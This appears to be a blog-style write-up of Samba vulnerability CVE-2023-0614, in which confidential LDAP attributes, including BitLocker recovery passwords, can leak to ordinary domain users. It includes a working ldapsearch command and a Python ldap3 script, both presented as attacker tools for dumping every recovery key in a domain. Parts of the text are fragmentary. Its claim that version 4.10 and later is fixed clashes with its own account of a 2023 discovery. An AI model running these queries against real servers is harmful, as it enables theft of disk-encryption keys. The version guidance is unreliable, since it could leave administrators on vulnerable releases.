In February 2023, security researchers discovered that several previous updates meant to patch a years-old vulnerability in Samba fell short. Specifically, the insufficient fixes from Samba releases 4.6.16, 4.7.9, 4.8.4, and 4.9.7—initially intended to resolve CVE-2018-10919—left a critical opening: attackers could still query confidential LDAP attributes, including highly sensitive BitLocker recovery keys, from an Active Directory Domain Controller (AD DC) running on Samba.
In this long read, we’ll break down what went wrong, how attackers could exploit the problem, and what proper fixes look like—with clear code snippets and links for further reading.
The Original Flaw (CVE-2018-10919)
Samba AD DC is widely used in mixed environments for managing user authentication, policies, and devices. In 2018, security researchers found that any authenticated user could search for and read confidential attributes in the Lightweight Directory Access Protocol (LDAP) directory—including BitLocker recovery passwords. That’s obviously a huge problem, since these keys can unlock full disk encryption.
Samba responded by updating the code in multiple releases to restrict who could view these confidential fields.
The Patch Wasn’t Enough (CVE-2023-0614)
In early 2023, it was discovered that the “confidential attribute filtering” did not work as intended. Attackers could craft LDAP queries to bypass the controls and still access fields marked as confidential.
Bottom Line: If you ran Samba AD DC 4.6.16+, 4.7.9+, 4.8.4+, or 4.9.7+ (but below patched versions), your server might leak BitLocker and other private info to any authenticated account.
What Exactly Went Wrong? (Technical Details)
The original Samba fix tried to apply access controls by filtering out “confidential” attributes in LDAP query responses unless the requester had administrator rights. Unfortunately, the filtering:
Wasn’t applied in all code paths (e.g., with complex filters, dereferenced linked attributes)
- Allowed clever attackers to request specific attributes (instead of all attributes) and get confidential data.
Here’s an example attacker trick
ldapsearch -LLL -x -H ldap://samba-ad-dc.example.com \
-D 'attackeruser@example.com' -W \
-b 'CN=Recovery Information,CN=System,DC=example,DC=com' \
'(&(objectClass=msFVE-RecoveryInformation)(msFVE-RecoveryPassword=*))' \
msFVE-RecoveryPassword
If your configuration is vulnerable, this search—run by an ordinary domain user—dumps the BitLocker recovery passwords for the whole domain!
How to Exploit the Vulnerability
Let’s walk through how an attacker would use this.
Ask specifically for the confidential attribute (e.g., msFVE-RecoveryPassword).
If your version of Samba did not filter attributes robustly, you’ll get the actual key values in plain text.
Sample Python Exploit
Here’s how an attacker could automate this with Python and ldap3:
from ldap3 import Server, Connection, AUTO_BIND_NO_TLS, SUBTREE, ALL_ATTRIBUTES
LDAP_SERVER = 'ldap://samba-ad-dc.example.com'
USER = 'attackeruser@example.com'
PASSWORD = 'P@sswrd'
BASE_DN = 'CN=Recovery Information,CN=System,DC=example,DC=com'
FILTER = '(msFVE-RecoveryPassword=*)'
server = Server(LDAP_SERVER)
conn = Connection(server, user=USER, password=PASSWORD, auto_bind=True)
conn.search(BASE_DN, FILTER, attributes=['msFVE-RecoveryPassword'])
for entry in conn.entries:
print(entry)
4.10. and later
These versions properly filter confidential attributes for non-admins, no matter which LDAP query is used.
Correct fix: *Every LDAP response, regardless of how it’s filtered or what exact fields are requested, must check if the requester is allowed to see each attribute.*
If you’re running old Samba domains, you absolutely must upgrade.
References
- Samba Security Advisory: CVE-2023-0614
- Samba Patch Commit Example
- Understanding BitLocker & msFVE-RecoveryPassword
- Samba Release Notes & Security
- ldap3 Python Library
Closing Thoughts
CVE-2023-0614 is a powerful reminder that security “fixes” need to be tested against every filter and edge case—especially when it comes to access controls on things like BitLocker keys. If you run Samba AD DC, check your version now and patch ASAP.
Timeline
Published on: 04/03/2023 23:15:00 UTC
Last modified on: 05/15/2023 18:44:00 UTC